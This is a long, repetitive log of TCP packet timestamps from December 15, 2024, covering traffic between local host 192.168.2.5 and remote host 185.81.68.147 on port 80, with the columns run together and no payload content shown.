                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.803597927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804548979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804605961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.804677010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805855036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805917025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.805991888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.806864023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.806972980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.807044983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808043957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808132887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.808214903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809415102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809509039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.809588909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810359955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810456991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.810537100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811525106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811669111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.811753035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812680006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812796116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.812865973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.813836098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.813951015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.814023972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815166950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815188885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.815274954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816165924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816261053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.816334963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817331076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817403078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.817488909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818519115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818648100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.818720102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819684029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819766045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.819834948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.820873022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.820965052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.821033001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.821973085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.822083950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.822153091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823177099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823260069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.823343992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824290037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824390888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.824460983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.825488091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.825591087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.005711079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.005749941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006767988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006858110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.006891966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.007993937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.008075953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.008126020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009068012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009231091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.009265900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010246992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010359049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.010401964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011548042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011630058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.011662006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012578011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012830019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.012867928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013722897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013777971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.013822079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.014894009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.015019894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.015060902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016057014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016176939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.016211033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017199993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017303944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.017349958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018415928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018481970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.018517971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019507885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019609928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019646883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.020723104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.067617893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152312040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152492046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152573109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152851105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152932882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152971029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154098988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154231071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154269934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155240059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155324936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155364990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156347036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156451941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156491041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157515049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157588005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157659054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158679008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158781052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158819914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.159826994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160029888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160062075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160979033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.161083937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.161151886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162132978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162175894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162211895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163341045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163408041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163448095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164477110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164586067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164654016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165673018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165766001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165798903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166834116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166939020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166974068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.167958021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.168112993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.168147087 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169137955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169328928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169363976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170283079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170398951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170461893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171456099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171566010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171600103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172596931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172718048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172754049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.173787117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354141951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354264975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354371071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355288029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355357885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355487108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356425047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356587887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356652975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357594013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357709885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357780933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358772993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358870983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358942032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.359963894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.360069036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.360141039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361094952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361181974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361257076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362282038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362381935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362462997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363437891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363524914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363600016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364572048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364706993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364777088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365746021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365888119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365957975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.366899967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.366991043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.367058039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368052959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368125916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368191957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369215012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369302034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369369030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370389938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370429993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370465040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371542931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371674061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371711016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372749090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372833967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372900009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.373858929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.373970985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.374005079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375009060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375102997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375138998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376189947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376312017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376380920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377346039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377482891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377517939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378505945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378598928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378640890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379702091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379801989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379873991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380821943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380889893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380919933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.381985903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.382085085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.382118940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383193970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383260012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383335114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384310961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384371996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384413958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385560036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385672092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385704041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386667013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386744976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386811018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.387909889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.387962103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.388000965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.388962030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.389095068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.389137030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390104055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390201092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.390233040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.391268015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.391387939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.571906090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.571975946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.572993040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.573112965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.573179960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574157953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574242115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.574317932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575344086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575431108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.575503111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576431990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576581001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.576647043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577619076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577744007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.577812910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578766108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578862906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.578933001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.579936981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.580039024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.580101967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581126928 CET8049708185.81.68.147192.168.2.5
